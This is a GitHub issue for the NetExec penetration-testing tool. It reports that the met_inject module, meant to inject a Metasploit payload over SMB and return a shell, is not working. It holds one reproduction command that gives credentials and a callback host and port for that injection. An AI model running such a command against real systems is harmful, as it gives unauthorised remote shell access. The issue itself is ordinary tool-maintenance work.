Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix module met_inject #223

Closed
Marshall-Hallenbeck opened this issue Mar 22, 2024 · 0 comments · Fixed by #296
Closed

Fix module met_inject #223

Marshall-Hallenbeck opened this issue Mar 22, 2024 · 0 comments · Fixed by #296
Assignees
Labels
bug Something isn't working investigation

Comments

@Marshall-Hallenbeck
Copy link
Collaborator

Marshall-Hallenbeck commented Mar 22, 2024

Describe the bug
The module doesn't seem to be working, or at least, the example payloads I previously documented are not working correctly

To Reproduce
Steps to reproduce the behavior i.e.:
Command: netexec smb -u username -p password -M met_inject -o SRVHOST=$ip SRVPORT=$port RAND=$rand

Expected behavior
I expect the module to inject a payload and get a shell

NetExec info

  • OS: Kali
  • Version of nxc: main (commit fb8c4bc)
  • Installed from: pipx

Goals

  1. Investigate if something is broken (it appears to be right now), and if so, what
  2. Document correct use-cases for users to use this module
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug Something isn't working investigation
Projects
None yet
Development

Successfully merging a pull request may close this issue.

1 participant